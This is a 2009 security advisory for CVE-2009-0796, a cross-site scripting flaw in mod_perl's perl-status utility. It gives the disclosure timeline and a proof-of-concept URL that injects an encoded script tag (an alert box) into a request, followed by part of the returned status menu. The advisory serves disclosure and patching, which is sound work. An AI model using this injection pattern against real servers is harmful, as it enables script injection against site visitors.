Vulnerability found: 28th February 2009 Vendor informed: 1st March 2009 Advisory last updated: 1st March 2009 Severity: Medium/High Credits: Richard Brain of ProCheckUp Ltd (www.procheckup.com) CVE reference: CVE-2009-0796 BID: 34383 Many thanks to Torsten Foertsch for his kind assistance in fixing the bug. Description: There is a Cross-site Scripting vulnerability on Mod_perl's, perl-status utility. The perl-status utility on request displays the current status of the Mod_perl server, and some configuration information. Perl-status when configured to allow any viewers, presents an information disclosure risk, Procheckup has found by making a malformed request to perl-status, that additionally a vanilla cross site scripting (XSS) attack is possible. Proof of concept: Submitting the following string to an unpatched server "server". http://server:80/perl-status/APR::SockAddr::port/%22%3E%3Cscript%3Ealert(1)%3C/script%3E The following is returned:-
?env">Environment
?inc">Loaded Modules
?inh_tree">Inheritance Tree
?isa_tree">ISA Tree
?myconfig">Perl Configuration
?rgysubs">Compiled Registry Scripts
?script">PerlRequire'd Files
?sig">Signal Handlers
?symdump">Symbol Table Dump